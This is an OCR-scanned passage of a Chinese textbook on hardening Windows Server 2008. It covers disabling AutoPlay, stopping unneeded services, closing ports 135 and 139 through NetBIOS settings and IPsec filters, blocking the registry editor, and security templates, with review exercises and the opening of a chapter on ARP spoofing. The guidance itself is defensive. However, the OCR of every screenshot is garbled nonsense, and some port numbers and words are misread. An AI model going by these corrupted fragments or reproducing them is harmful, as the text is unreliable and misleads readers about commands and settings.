等 网 络 服 务 , 删 除 前 应 仔细 确认 Windows Server 2008 操作 系统 所 扮演 的 角色 ,是 作为 单独 
的 桌面 操作 系统 使 用 ,还 是 作为 网 络 操作 系统 提供 各 种 网 络 服务 使 用 。 

4) 关闭 自动 播放 功能 

现在 很 多 病毒 (如 U 盘 病 毒 ) 会 利用 系统 的 自动 播放 功能 来 进行 传播 ,关闭 系统 的 自动 
播放 功能 可 以 降低 病毒 传播 的 风险 。 

步骤 1: 选择 “开始 ” 盖 运行 ”命令 ,打开 * 运 行 ? 对 话 框 ,在 对 话 框 的 “打开 ”文本 框 中 输 
入 gpedit. msc 命令 ,然后 单 击 “ 确 定 ” 按 钮 ,打开 “本 地 组 策略 编辑 器 ”窗口 。 

步骤 2: 在 窗口 的 左 侧 窗 格 中 ,选择 “本 地 计算 机 策略 ”一 “计算 机 配置 ”一 “管理 模 
板 ”>“Windows 组 件 ” 一 “自动 播放 策略 ”选项 ,然后 在 右 侧 窗 格 中 找到 并 双击 “关闭 自动 播 
放 ” 选 项 (如 图 2-29 所 示 ) ,打开 “关闭 自动 播放 ”窗口 。 

















田园 i 
卡 局 四 行 此 操作 ” 复 选 杠 
3 人 的 
辐 网 络 投影 仪 少 Windows 自动 运行 的 中 认 行为 
EE 


田 昌 3 
田 同 和 wes 上 的 音乐 和 立即 启动 
在 Se 之 前 ， 黑 认 情况 下 , 自 
动 播放 在 可 称 动 动 器 dt 软盘 红 动 
器 ， a a 驱动 器 ) 和 网络 
驱动 器 上 被 
从 好 sP2 开始 ,自动 播放 也 在 可 
移动 驱动 器 (包括 ZIP 驱动 器 和 某 
些 USB 大 容量 存储 设备 ) 上 启用 。 
如 果 襄 周 此 讼 天 Ne Se 
B00 和 辣 移动 介质 纪 动 器 上 的 
要 te PP sl 加 
[| 


图 2-29 “本 地 组 策略 编辑 器 "窗口 








步骤 3: 选中 “已 启用 ” 单 选 按钮 ,并 在 “关闭 自动 播放 ”下 拉 列 表 中 选择 需要 的 选项 ,如 
“所 有 驱动 器 ”, 如 图 2-30 所 示 , 单 击 “ 确 定 ” 按 钮 。 

说 明 “关闭 自动 播放 ”设置 是 只 能 使 系统 不 再 列 出 光盘 和 移动 存储 设备 的 目录 ,并 不 
能 够 阻止 自动 播放 音乐 CD 盘 。 要 阻止 音乐 CD 的 自动 播放 ,可 更 改 移动 存储 设备 的 属性 。 
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关闭 自动 轿 放 








2-30 “关闭 自动 播放 ”窗口 


2.4.4 任务 4: 服务 安全 配置 


1. 任务 目标 

(1) 了 解 操作 系统 服务 安全 的 重要 性 。 

(2) 掌握 服务 安全 配置 的 方法 。 

2. 任务 内 容 

(1) 关闭 不 必要 的 服务 。 

(2) 关闭 不 必要 的 端口 。 

3. 完成 任务 所 需 的 设备 和 软件 

安装 有 Windows Server 2008 操作 系统 的 计算 机 1 台 。 

4. 任务 实施 步骤 

1) 关闭 不 必要 的 服务 

在 Windows 操作 系统 中 ,默认 开启 的 服务 有 很 多 ,但 并 非 所 有 开启 的 服务 都 是 操作 系 
统 所 必需 的 ,禁止 所 有 不 必要 的 服务 可 以 节省 内 存 和 大 量 的 系统 资源 ,提升 系统 启动 和 运行 
的 速度 ,更 重要 的 是 ,可 以 减少 系统 受 攻击 的 风险 。 

步骤 1: 查看 服务 。 选 择 “ 开 始 ”>“ 所 有 程序 ”>“ 管 理工 具 ”>“ 服 务 ” 命 令 ,打开 “服务 ” 
窗口 ,如 图 2-31 所 示 , 可 见 有 很 多 服务 已 启动 。 
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Shell Mardware Detection 
Benote Access Cennecti 


于; Desktop Configu 
如 Desktop Services 


Desktop Service. 


撕 壕 : 我 Benote Procedure call 
为 自动 播放 硬件 事件 提供 通知 。 各 Procedure Call 
全 hmote Beeistry 
hesultant Set of Polic - 
Routing and Renote Access 


人 mrc Enapoint Napper 

我 Secondury Logon 

全 Secure Socket Tamelin 

ecwity heevents Senate 
Server 


Surt ced 
sourt Curd Renoval Folicy 
总 sam rr 

softrere Protection 
Bspecid Mninistration 
FP Notification Service 
ssDP Discovery 

网 System Event Jotificwt. 

人 Tesk schetaer 

RTCP/IP WetBIos Helper 


j 江 斋 用 此 游 半 加 游 小 本 图 六 田 注 时 型 时 浪 府 时 员 沙 溃 太 





图 2-31 “服务 ”窗口 


步骤 2: 关闭 Shell Hardware Detection 服务 。 在 图 2-31 中 找到 并 双击 Shell 
Hardware Detection 服务 选项 ,打开 “Shell Hardware Detection 的 属性 "对话 框 ,如 图 2-32 
所 示 。 单 击 “ 停 止 " 按 钮 , 停 用 Shell Hardware Detection 服务 ,再 在 “启动 类 型 ?下 拉 列 表 中 
选择 “禁用 ”选项 ,这 样 下 次 系统 重新 启动 时 不 会 重新 启用 Shell Hardware Detection 服务 ， 
单 击 “ 确 定 ” 按 钮 。 





ction 的 属性 (本 地 计算 机 


Il 1 做 夏 | 信和 | 








图 2-32 “Shell Hardware Detection 的 属性 ”对 话 框 
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2) 关闭 不 必要 的 端口 
每 一 项 服务 都 对 应 相应 的 端口 ,比如 众所周知 WWW 服务 的 端口 为 80,SMTP 服务 的 
端口 为 25,FTP 服务 的 端口 为 21,Telnet 服务 的 端口 为 23 等。 对 于 一 些 不 必要 的 端口 ,应 
将 它们 关闭 。 在 Windows 系统 目录 中 的 system32\drivers\etc\services 文件 中 有 公认 端口 
和 服务 的 对 照 表 ,如 图 2-33 所 示 。 
Er 
(copyright (c) 1993-288% Microsoft Corp- 
his File contains port numbers for vell-know services defined by 10 


Format: 
中 


<service nane> 《port number>/<protocol> [aliases...] [ticonnent>] 
吕 


7/tcp 

7/udp 

9/tcp sink null 

9/udp sink null 

11/tcp users HActive users 

11/udp users HActive users 

13/tcp 

13/udp 

17/tcp quote Huote of the day 

17/udp quote Wuote of the day 

19/tcp ttytst source HCharacter generatol 

19/udp ttytst source #Character generatol 

28/tcp HFTP, data 

21/tcp HFTP. control 

22/tcp HSSH Renote Login PI 

23/tcp 

25/tcp nail #Sinple Mail Transfl 

37/tcp tinserver 

37/udp ~ tinserver 

39/udp resource Resource Location | 

M2/tcp nane HHost Name Server 

42/udp nane HHost Name Server 

43/tcp whois 

53/tcp HDonain Nane Seruer 

53/udp Donain Nane Server 

67/udp dhcps #8ootstrap Protocol 

68/udp dhcpe WBootstrap Protocol 局 
UE 





2-33 ”端口 与 服务 对 照 表 


(1) 用 netstat 命令 查看 本 机 开放 的 端口 。 系 统 内 部 命令 netstat 可 显示 有 关 统 计 信 息 
和 当前 TCP/IP 网 络 连接 的 情况 , 它 可 以 用 来 获得 系统 网 络 连接 的 信息 (使 用 的 端口 和 在 使 
用 的 协议 等 )、 收 到 和 发 出 的 数据 、 被 连接 的 远程 系统 的 端口 等 。 其 语法 格式 为 

netstat [-al] [-e] [-n] [-s] [-P protocol][-r] [interval] 

在 “命令 提示 符 ” 窗 口中 ,输入 netstat -an 命令 ,查看 系统 端口 状态 , 列 出 系统 正在 开放 
的 端口 号 及 其 状态 ,如 图 2-34 所 示 ,可 见 系统 开放 的 端口 号 有 135、445、137、138、139 等 。 

(2) 关闭 139 端口 。139 端口 是 NetBIOS 协议 所 使 用 的 端口 ,在 安装 了 TCP/IP 的 同 
时 ,NetBIOS 也 会 被 作为 默认 设置 安装 到 系统 中 。139 端口 的 开放 意味 着 硬盘 可 能 会 在 网 
络 中 共享 ;网 上 黑客 也 可 通过 NetBIOS 知道 用 户 计算 机 中 的 一 切 。 在 以 前 的 Windows 版 
本 中 ,只 要 不 安装 Microsoft 网 络 的 文件 和 打印 机 共享 协议 ,就 可 关闭 139 端口 。 但 在 
Windows Server 2008 中 ,只 这 样 做 是 不 行 的 。 如 果 想 彻底 关闭 139 端口 ,具体 操作 步骤 
如 下 。 
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TIME_WAIT 


9.0.9.9 
9-B.B.B 
9-9-B-B 
9.0.0.6 














图 2-34 “netstat -an” 命 令 的 使 用 


步骤 1: 右 击 屏幕 右 下 角 任务 栏 中 的 “网 终 
络 和 共享 中 心 ” 命 令 , 打 开 “ 网 络 和 共享 中 心 


图 标 科 ,在 弹出 的 快捷 菜单 中 选择 “打开 网 









EE 
口 , 单 击 “ 本 地 连接 ”链接 ,打开 “本 地 连接 状 中 
态 ” 对 话 框 。 连接 时 使 用 


EM Intel (R) PRO/1000 NT Network Connection 
步骤 2: 单 击 “ 属 性 ”按钮 ,打开 “本 地 连接 属 
Lasc |] 
性 ?对 话 框 , 取 
加 哪 呈 croxoft 网 绍 宕 户 汪 


打印 机 共 先 框 ( 即 去 掉 “Microsoft 网 络 的 回 局 6cs 抄 据 包 计 : 

D rp 
文件 和 打印 机 共享 ”前面 的 “VV”), 如 图 2-35 3 
所 示 。 


= < Internet 协议 版 本 4 (TCP/IPv4) 
回 二 镑 路 层 拓扑 发 现 映射 器 I70 驱动 程序 
步骤 3: 选中 “Internet 协议 版 本 4(TCP - 
IPv4)” 选 项 , 单 击 “ 属 性 ”按钮 ,打开 “Internet 协 TR i 


加 镑 路 层 拓 盾 发 现 响应 程序 

议 版 本 4(TCP/IPv4) 属性 "对话 框 ,如 图 2-36 | ie 
所 示 。 

步骤 4: 单 击 “ 高 级 ”按钮 ,打开 “高 级 TCP 
IP 设置” 对话 框 ,在 “WINS” 选 项 卡 中 ,选中 “ 禁 
用 TCP/IP 上 的 NetBIOS” 单 选 按钮 ,如 图 2-: 
所 示 。 

步骤 5: 单 击 “ 确 定 ” 按 钮 ,返回 "Internet 协议 版 本 4(TCP/IPv4) 属 性 ”对 话 框 ,再 单 击 






CE 择 “Microsoft 网 络 的 文件 和 此 连接 使 用 下 列 顺 目 0) 





















图 2-35 “本 地 连接 属性 ”对 话 框 
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2-36 “Internet 协议 版 本 4(TCP/IPv4) 属性 ”对 话 框 图 2-37 “高 级 TCP/IP 设置 ”对 话 框 


(3) 关闭 其 他 端口 。 在 默认 情况 下 ,Windows 操作 系统 的 很 多 端口 是 开放 的 。 用 户 在 
上 网 的 时 候 , 病 毒 和 黑客 可 通过 这 些 端口 连 上 用 户 的 计算 机 ,所 以 应 该 关闭 这 些 端口 。 比 如 
TCP 135、139、445、593、1025 端口 和 UDP 135、137、138、445 端口 ,一 些 流行 病毒 的 后 门 端 
口 , 如 TCP 2745、3127、6129 端口 ,以 及 远程 服务 访问 端口 3389 等 ,都 需要 被 关闭 才 可 解除 
隐患 。 下 面 以 关闭 TCP 135 端口 为 例 ,介绍 关闭 端口 的 方法 。 

步骤 1: 选择 “开始 ”>“ 所 有 程序 ”>“ 管 理工 具 ”->“ 本 地 安全 策略 ”命令 ,打开 “本 地 安 
全 策略 ”窗口 ,在 左 侧 窗 格 中 ,选择 “IP 安全 策略 ,在 本 地 计算 机 ”选项 ,在 右 侧 窗 格 的 空白 位 
置 右 击 ,在 弹出 的 快捷 菜单 中 选择 “创建 IP 安全 策略 ”命令 ,如 图 2-38 所 示 。 








此 视图 中 没有 可 显示 的 项 目 。 


2-38 “本 地 安全 策略 "窗口 (1) 


步骤 2: 在 打开 的 向 导 中 单 击 “ 下 一 步 "按钮 ,出 现 *IP 安全 策略 名 称 ” 对 话 框 ,在 “名 称 ” 
文本 框 输 入 “关闭 TCP 135 端口 的 策略 ”, 如 图 2-39 所 示 。 
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图 2-39 “IP 安全 策略 名 称 ” 对 话 框 


步骤 3: 单 击 " 下 一 步 " 按 钮 ,出 现 “ 安 全 通信 请 求 " 对 话 框 ,取消 选中 “激活 默认 响应 规则 
( 仅 限 于 Windows 的 早期 版 本 )” 复 选 框 ,如 图 2-40 所 示 。 








图 2-40 “安全 通信 请 求 "对 话 框 


步骤 4: 单 击 “ 下 一 步 " 按 钮 ,再 单 击 “完成 "按钮 ,打开 “关闭 TCP 135 端口 的 策略 属性 ” 
对 话 框 ,如 图 2-41 所 示 。 

步骤 5: 在 “规则 ”选项 卡 中 ,取消 选择 “使 用 “添加 向 导 '” 复 选 框 ,再 单 击 “ 添 加 ”按钮 , 打 
开 “ 新 规则 属性 ”对 话 框 ,如 图 2-42 所 示 。 

步骤 6: 单 击 “添加 ”按钮 ,打开 *IP 筛选 器 列表 ”对 话 框 ,在 “名 称 ” 文 本 框 中 输入 "关闭 
135 端口 ,取消 选中 “使 用 添加 向 导 ” 复 选 框 ,如 图 2-43 所 示 。 

步骤 7: 单 击 “ 添 加 ”按钮 ,打开 “IP 筛选 器 属性 对话 框 ,在 “地 址 ?选项 卡 中 ,在 “ 源 地 
址 下拉 列表 框 中 选择 “任何 IP 地 址 ”选项 ,在 “目标 地 址 ”下 拉 列 表 框 中 选择 “我 的 IP 地 址 ” 
选项 ,如 图 2-44 所 示 。 
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图 2-43 “IP 筛选 器 列表 ?对话 框 


IP 第 先 器 属性 








图 2-44 “IP 筛选 器 属性 ”对 话 框 (1) 
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步骤 8: 在 “协议 ”选项 卡 中 ,选择 协议 类 型 为 TCP, 选 中 “从 任意 端口 ?和 “到 此 端口 " 单 
选 按钮 ,并 在 其 下 方 的 文本 框 中 输入 端口 号 135, 如 图 2-45 所 示 。 
步骤 9: 单 击 “确定 ”按钮 ,返回 “IP 筛选 器 列表 ?对话 框 ,再 单 击 * 确 定 ” 按 钮 ,返回 “新 规 
则 属性 ?对 话 框 , 可 以 看 到 已 经 添加 了 一 条 * 关 闭 135 端口 ?筛选 器 ,如 图 2-46 所 示 , 它 可 以 
防止 外 界 通过 135 端口 连 上 用 户 的 计算 机 。 同 理 , 可 添加 其 他 IP 筛选 器 。 











图 2-45 “IP 筛选 器 属性 ”对 话 框 (2) 2-46 “新 规则 属性 ”对 话 框 (2) 


步骤 10: 选择 “关闭 135 端口 "筛选 器 ,然后 单 击 其 左边 的 圆圈 ,表示 已 经 激活 ,然后 选 
择 “ 筛 选 器 操作 ?选项 卡 , 如 图 2-47 所 示 。 

步骤 11: 在 “筛选 器 操作 ?选项 卡 中 ,取消 选择 “使 用 "添加 向 导 ”" 复 选 框 , 单 击 * 添 加 ? 按 
钮 ,打开 * 新 筛选 器 操作 属性 ”对话 框 ,如 图 2-48 所 示 。 


新 规则 属性 1 











2-47 “筛选 器 操作 ?选项 卡 (1) 图 2-48 “新 筛选 器 操作 属性 ”对 话 框 
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步骤 12: 选中 "阻止 " 单 选 按钮 ,然后 单 击 * 确 定 ? 按 钮 ,返回 “筛选 器 操作 ?选项 卡 ,在 “得 
选 器 操作 ?选项 卡 中 ,可 以 看 到 已 经 添加 了 一 个 新 的 筛选 器 操作 。 选 择 * 新 筛选 器 操作 ” 选 
项 ,然后 单 击 其 左边 的 圆圈 ,表示 已 经 激活 ,如 图 2-49 所 示 。 

步骤 13: 单 击 “ 关 闭 ” 按 钮 ,返回 到 “关闭 TCP 135 端口 的 策略 属性 ”对 话 框 ,选中 “关闭 
135 端口 " 复 选 框 ,如 图 2-50 所 示 , 单 击 “ 确 定 ” 按 钮 关闭 对 话 框 。 








编辑 规则 属性 关闭 TCP 135 庙 口 的 策略 属性 








图 2-49 “筛选 器 操作 ”选项 卡 (2) 图 2-50 “关闭 TCP 135 端口 的 策略 属性 ”对 话 框 (2) 


步骤 14: 在 “本 地 安全 策略 ”窗口 中 , 右 击 新 添加 的 “关闭 TCP 135 端口 的 策略 ”选项 ， 
在 弹出 的 快捷 菜单 中 选择 "分配" 命令 ,如 图 2-51 所 示 。 

重新 启动 计算 机 后 ,上 述 网 络 端 口 就 被 关闭 了 ,病毒 和 黑客 再 也 不 能 连 上 这 些 端口 ,从 
而 保护 了 计算 机 的 安全 。 





蕊 本 地 安全 策略 


日 区 
田 敬 
田园 
国 
田 国 
田 国 
田 国 
a 旬 








图 2-51 “本 地 安全 策略 ”窗口 (2) 
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2.4.5 任务 5: 禁用 注册 表 编 辑 器 


1. 任务 目标 

(1) 了 解 操作 系统 注册 表 的 作用 。 

(2) 掌握 注册 表 编 辑 器 的 禁用 方法 。 

2. 完成 任务 所 需 的 设备 和 软件 

安装 有 Windows Server 2008 操作 系统 的 计算 机 1 台 。 

3. 任务 实施 步骤 

注册 表 是 Microsoft Windows 中 的 一 个 重要 的 数据 库 , 用 于 存储 系统 和 应 用 程序 的 设 
置信 息 。Regedit. exe 是 微软 提供 的 一 个 编辑 注册 表 的 工具 ,是 所 有 Windows 系统 通用 的 
注册 表 编 辑 工 具 。Regedit. exe 可 以 进行 添加 修改 注册 表 主 键 \ 修 改 键 值 .备份 注 册 表 、 局 部 
导入 导出 注册 表 等 操作 。 

Windows 操作 系统 安装 完成 后 ,默认 情况 下 Regedit. exe 可 以 任意 使 用 ,为 了 防止 非 网 
络 管理 人 员 恶 意 使 用 ,应 禁止 Regedit. exe 的 使 用 。 

步骤 1: 选择 “开始 ”一 “运行” 命令 ,打开 “运行 "对 话 框 ,在 对 话 框 的 “打开 ”文本 框 中 输 
人 “gpedit. msc” 命 令 , 然 后 单 击 “ 确 定 ” 按 钮 ,打开 “本 地 组 策略 编辑 器 "窗口 。 

步骤 2: 在 窗口 的 左 侧 窗 格 中 ,选择 “本 地 计算 机 策略 ”>“* 用 户 配 置 "=>“ 管 理 模板 ”一 
“系统 ”选项 ,如 图 2-52 所 示 。 


查看 0) 帮助 00 
Ee 

















阻止 访问 注册 表 编 辑 工具 
编辑 第 梧 设 置 


要 求 
至 少 Windows 2000 


| 描述 
pe a 注册 去 编辑 器 Ee 
国 区 域 设置 服务 


可 让 刘 汪 站 且 用户 车 动 
， 则 会 出现 一 
和。 


Me 


夫人 请 
A Windows 应 用 程 











图 2-52 “本 地 组 策略 编辑 器 "窗口 
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步骤 3: 在 右 侧 窗 格 中 找到 并 双击 “阻止 访问 注册 表 编辑 工具 ”选项 ,打开 * 阻 止 访问 注 
册 表 编辑 工具 ”窗口 ,选中 “已 启用 ” 单 选 按 钮 ,如 图 2-53 所 示 , 单 击 “确定 ”按钮 返回 “本 地 组 
策略 编辑 器 ”窗口 。 








阻止 访问 注册 直 编 辑 工 具 








图 2-53 “阻止 访问 注册 表 编辑 工具 ”窗口 


步骤 4: 选择 “开始 ”>“ 运 行 "命令 ,打开 “运行 ”对话 框 ,在 对 话 框 的 “打开 ”文本 框 中 输 
入 Regedit. exe 命令 ,然后 单 击 “ 确 定 ” 按 钮 ,系统 将 会 提示 “注册 表 编 辑 已 被 管理 员 禁 用 ” 信 
息 , 如 图 2-54 所 示 。 





x 注册 表 编 辑 器 





2-54 禁用 注册 表 编 辑 器 警告 信息 


25 拓展 提升 : Windows 系统 的 安全 模板 


1. 什么 是 安全 模板 

安全 模板 是 由 Windows Server 2003 支持 的 安全 属性 的 文件 (. inf) 组 成 的 。 安 全 模板 
将 所 有 的 安全 属性 组 织 到 一 个 位 置 ,以 简化 安全 性 管理 。 安 全 模板 包含 了 安全 性 信息 账户 
策略 、 本 地 策略 、 事 件 日 志 , 受 限制 的 组 、 系 统 服 务 、 注 册 表 文件 系统 等 共 7 类 。 安 全 模板 也 
可 以 用 做 安全 分 析 。 通 过 使 用 安全 模板 管理 单元 ,可 以 创建 对 网 络 或 计算 机 的 安全 策略 。 
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安全 模板 是 代表 安全 配置 的 文本 文件 ,将 其 应 用 于 本 地 计算 机 、 导 入 到 组 策略 或 使 用 安全 模 
板 来 分 析 安 全 性 。 

2. 预定 义 的 安全 模板 

预定 义 的 安全 模板 是 作为 创建 安全 策略 的 初始 点 而 提供 的 ,这 些 策略 都 经 过 自 定义 设 
置 以 满足 不 同 的 组 织 要 求 。 可 以 使 用 安全 模板 管理 单元 对 模板 进行 自 定义 设置 。 一 旦 对 预 
定义 的 安全 模板 进行 了 自 定义 设置 ,就 可 以 用 这 些 模板 配置 单 台 或 数 千 台 计算 机 的 安全 性 。 
可 以 使 用 安全 配置 和 分 析 管 理 单元 、Secedit. exe 命令 提示 符 工具 或 将 模板 导入 本 地 安全 策 
略 中 来 配置 单 台 计算 机 。 在 Windows Server 2003 中 预定 义 的 安全 模板 如 下 。 

(1) 默认 安全 设置 (Setup security. inf) 。Setup security. inf 代表 在 安装 操作 系统 期 间 
所 应 用 的 默认 安全 设置 ,其 中 包括 对 系统 驱动 器 的 根 目录 的 文件 权限 。 此 模板 的 某 些 部 分 
可 应 用 于 故障 恢复 。 

(2) 兼容 (compatws. inf)。 工 作 站 和 服务 器 的 默认 权限 主要 授予 3 个 本 地 组 : 
Administrators\Power Users 和 Users。Administrators 享有 最 高 的 权限 ,而 Users 的 权限 
最 低 。 不 要 将 兼容 模板 应 用 到 域 控制 器 。 

(3) 安全 (secure * .inf) 。 安 全 模板 定义 了 至 少 可 能 影响 应 用 程序 兼容 性 的 增强 安全 
设置 。 例 如 ,安全 模板 定义 了 更 严密 的 密码 .锁定 和 审核 设置 。 

此 外 ,安全 模板 还 限制 了 LAN Manager 和 NTLM 身份 认证 协议 的 使 用 ,其 方式 是 将 
客户 端 配 置 为 仅 可 发 送 NTLMv2 响应 ,而 将 服务 器 配置 为 可 拒绝 LAN Manager 的 响应 。 

安全 模板 细 分 为 securews. inf 和 securedc. inf。securews. inf 应 用 于 成 员 计 算 机 ， 
securedc. inf 应 用 于 服务 器 。 

(4) 高 级 安全 (hisec x . inf) 。 高 级 安全 模板 是 对 加 密 和 签名 做 进一步 限制 的 安全 模板 
的 扩展 集 , 这 些 加 密 和 签名 是 进行 身份 认证 和 保证 数据 通过 安全 通道 以 及 在 SMB 客户 机 
和 服务 器 之 间 进 行 安全 传输 所 必需 的 。 例 如 ,安全 模板 可 以 使 服务 器 拒绝 LAN Manager 
的 响应 ,而 高 级 安全 模板 则 可 以 使 服务 器 同时 拒绝 LAN Manager 和 NTLM 的 响应 。 安 全 
模板 可 以 启用 服务 器 端的 SMB 数据 包 签 名 ,而 高 级 安全 模板 则 要 求 这 种 签名 。 此 外 ,高 级 
安全 模板 还 要 求 对 安全 通道 数据 进行 强力 加 密 和 签名 ,从 而 形成 域 到 成 员 以 及 域 到 域 的 信 
任 关系 。 

高 级 安全 模板 细 分 为 hisecws. inf 和 hisecdc. inf。 一 般 ,hisecws. inf 应 用 于 普通 服务 
器 ,hisecdc. inf 应 用 于 域 控 制 器 。 

(5) 系统 根 目 录 安 全 (rootsec. inf) 。rootsec, inf 可 以 指定 由 Windows Server 2008 所 
引入 的 新 的 根 目录 权限 。 默 认 情 况 下 ,rootsec. inf 为 系统 驱动 器 根 目录 定义 这 些 权 限 。 如 
果 不 小 心 更 改 了 根 目 录 权 限 , 则 可 以 利用 该 模板 重新 应 用 根 目 录 权限 ,或 者 通过 修改 模板 对 
其 他 卷 应 用 相同 的 根 目录 权限 。 

3. 使 用 安全 模板 

Windows Server 2003 中 运行 mmc. exe 命令 ,打开 控 制 台 .选择 菜单 “文件 ”添加 / 删 
除 管理 单元 ”命令 ,把 “安全 模板 ”添加 到 控制 台中 。 双 击 “ 安 全 模板 ”选项 ,可 以 看 到 几 个 预 
定义 的 安全 模板 ,如 图 2-55 所 示 。 这 些 模板 保存 在 %systemroot%\security\templates 中 ， 
用 户 也 可 以 创建 包含 安全 设置 的 自 定义 安全 模板 。 

Windows Server 2008 中 %systemroot%\security\templates 里 的 模板 默认 是 空 的 ,用 
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ET TT Tol 


自 国 安全 模板 
| 日 全 C WIDOWS\security\tenplates 


iesacls 
rootsee 
securede 
Securews 
setup :eeurity 


图 图 力图 田 图 国 





2-55 Windows Server 2003 安全 模板 


户 可 以 从 网 上 下 载 ,或 者 选用 保存 好 的 安全 模板 ,通过 “新 加 模板 搜索 路 径 ” 找 到 文件 ,如 
图 2-56 所 示 。 

双击 要 修改 的 安全 策略 ,根据 需要 进行 修改 后 , 右 击 已 修改 的 安全 配置 模板 的 名 称 , 然 
后 选择 “另存 为 "命令 ,新 建 一 个 模板 。 


控制 台 ! 








2-56 ”Windows Server 2008 安全 模板 


习 是 


一 、 选 择 题 
1. 查看 端口 的 命令 是 ( ”)。 
A. netstat B. ping C. route D. tracert 


2. ( ”) 是 一 种 登录 系统 的 方法 , 它 不 仅 绕 过 系统 已 有 的 安全 设置 ,而 且 还 能 挫败 系 
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统 上 的 各 种 增强 的 安全 设置 。 
A. 漏洞 B. 端口 C. 后 门 D. 服务 
3. 在 ( ””) 属 性 对 话 框 中 ,可 以 设置 几 次 无 效 登 录 后 就 锁定 账户 。 
A. 账户 锁定 阔 值 B. 密码 策略 
C. 账户 锁定 时 间 D. 复位 账户 锁定 计数 器 


4. 在 Windows Server 2008 用 户 “ 密 码 策略 ”设置 中 ,“ 密 码 必 须 符合 复杂 性 要 求 ”策略 
启用 后 ,用 户 设置 密码 时 必须 满足 ( ) 要 求 。( 多 选 题 ) 
A. 必须 使 用 大 写字 母 数字、 小 写字 母 和 符号 中 的 3 种 
B. 密码 最 小 长 度 为 6 位 
C. 密码 中 不 得 包括 全 部 或 部 分 用 户 名 
D. 密码 长 度 没有 限制 
.Windows Server 2008 服务 器 可 以 采取 的 安全 措施 包括 ( )。( 多 选 题 ) 
A. 使 用 NTFS 格式 的 磁盘 分 区 
B. 及 时 对 操作 系统 使 用 补丁 程序 堵塞 安全 漏洞 
C. 实行 强 有 力 的 安全 管理 策略 
D. 借助 防火 墙 对 服务 器 提供 保护 
E. 关闭 不 需要 的 服务 器 组 件 
6. 终端 服务 是 Windows 操作 系统 自 带 的 ,可 以 通过 图 形 界面 远程 操纵 服务 器 。 在 默 
认 的 情况 下 ,终端 服务 的 端口 号 是 ( 让 
A. 25 B. 3389 C. 80 D. 1399 
二 、 填空 题 
1. WWW 服务 的 端口 号 是 ,SMTP 服务 的 端口 号 是 ,FTP 服务 的 端 
口号 是 。 ,Telnet 服务 的 端口 号 是 ,DNS 服务 的 端口 号 是 
2. 是 介 于 控制 面板 和 注册 表 之 间 的 一 种 修改 系统 与 设置 程序 的 工具 ， 利用 它 
可 以 修改 Windows 的 桌面 、 开 始 菜 单 、 登 录 方式 、 组 件 、 网 络 及 IE 浏览 器 等 许多 设置 。 
各 是 指 某 个 程序 (包括 操作 系统 ) 在 设计 时 未 考虑 周全 , 当 程序 遇 到 一 个 看 似 
合理 ,但 实际 无 法 处 理 的 问题 时 ,引发 的 不 可 预见 的 错误 。 
4. 是 指 绕 过 安全 性 控制 而 获取 对 程序 或 系统 访问 权 的 方法 。 
三 、 简 答题 
1. 什么 是 操作 系统 的 安全 ? 其 主要 研究 什么 内 容 ? 
2. 简 述 操作 系统 账号 和 密码 的 重要 性 。 有 哪些 方法 可 能 保护 密码 而 不 被 轻易 破解 或 
盗 取 ? 
3. 如 何 关 闭 不 需要 的 端口 和 服务 ? 


a 
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项 目 3 网 络 协议 与 分 析 


【项 目 目标 】 


(1) 了 解 OSI 参考 模型 和 TCP/IP 参考 模型 。 
(2) 了 解 以 太 网 的 帧 格式 。 

(3) 了 解 网 络 层 协议 和 传输 层 协议 。 

(4) 了 解 三 次 握手 机 制 。 

(5) 掌握 ARP 欺骗 攻击 的 原理 和 防范 方法 。 
(6) 会 使 用 Sniffer 抓 包 软 件 。 

(7) 了 解 端口 镜像 。 


31 项 目 提 出 


张 先生 在 企业 的 网 络 中 心 工作 ,负责 整个 企业 网 络 的 管理 和 维护 ,作为 网 络 管理 员 需 要 
时 刻 了 解 企业 网 络 流量 情况 ,并 对 网 络 流量 进行 监控 ,以 便 及 时 发 现 并 解决 可 能 出 现 的 网 络 
问题 。 最 近 有 多 位 企业 员工 反映 ,近期 访问 外 网 的 速度 时 快 时 慢 ,甚至 不 能 访问 外 网 ,请求 
网 络 中 心 给 予 解 决 。 


32 项 目 分 析 


从 各 位 员工 反映 的 上 网 情况 来 看 ,网 速 变 慢 是 最 近 发 生 的 事情 ,近期 企业 内 部 没有 进行 
网 络 设备 的 调整 ,网 络 环境 没有 发 生变 化 ,网 络 应 用 也 没有 大 的 变化 ,这 应 该 是 网 络 中 有 蜡 
常 流量 造成 的 。 

张 先生 经 过 调查 发 现 ,网 络 中 存在 以 下 网 络 故 障 现象 。 

(1) 某 部 门 的 所 有 计算 机 配置 相同 , 且 处 于 同一 个 网 段 , 唯 独 某 一 台 计算 机 无 法 上 网 ， 
而 且 网 络 、 网 络 接口 等 都 正常 ,该 计算 机 重新 启动 后 网 络 恢复 正常 ,过 一 段 时 间 后 ,网 络 又 瘫 
痪 了 。 

(2) 网 络 中 的 计算 机 逐 台 掉 线 ,最 后 导致 全 部 计算 机 无 法 上 网 。 

(3) 某 计算 机 上 网 时 突然 掉 线 ,一 会 儿 又 恢复 了 .但 恢复 后 上 网 一 直 很 慢 , 而 且 在 与 局 
域 网 内 的 其 他 计算 机 共享 文件 时 速度 也 变 慢 。 
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(4) 网 络 中 用 户 上 不 了 网 或 者 网 速 很 慢 。 

张 先生 用 网 络 监听 工具 Sniffer Pro 来 嗅 探 网 络 中 的 数据 包 , 发 现 网 络 中 存在 大 量 的 
ARP 数据 包 , 而 且 计算 机 ARP 缓存 表 中 的 网 关 MAC 地 址 已 被 修改 ,导致 网 络 变 慢 甚 至 无 
法 上 网 ,这 就 是 典型 的 ARP 欺骗 攻击 。 

在 计算 机 中 利用 “ARP -s 网 关 IP 网 关 MAC” 命 令 静 态 设 置 正确 的 网 关 MAC 地 址 ,在 
网 关 ( 一 般 是 路 由 器 ) 中 对 局 域 网 内 的 主机 IP 地 址 与 其 相应 的 MAC 地 址 也 进行 静态 绑 定 ， 
上 网 恢复 正常 。 


33 相关 知识 点 


3.3.1 计算 机 网 络 体系 结构 


1. OSI 参考 模型 

在 计算 机 网 络 诞生 之 初 ,每 个 计算 机 厂商 都 有 一 套 自己 的 网 络 体系 结构 ,之 间 互 不 相 
容 。 为 此 ,国际 标准 化 组 织 (ISO) 在 1979 年 建立 了 一 个 分 委员 会 来 专门 研究 一 种 用 于 开放 
系统 互联 的 体系 结构 , 即 OSI.“ 开 放 ” 这 个 词 表示 : 只 要 遵循 OSI 标准 ,一 个 系统 可 以 和 位 
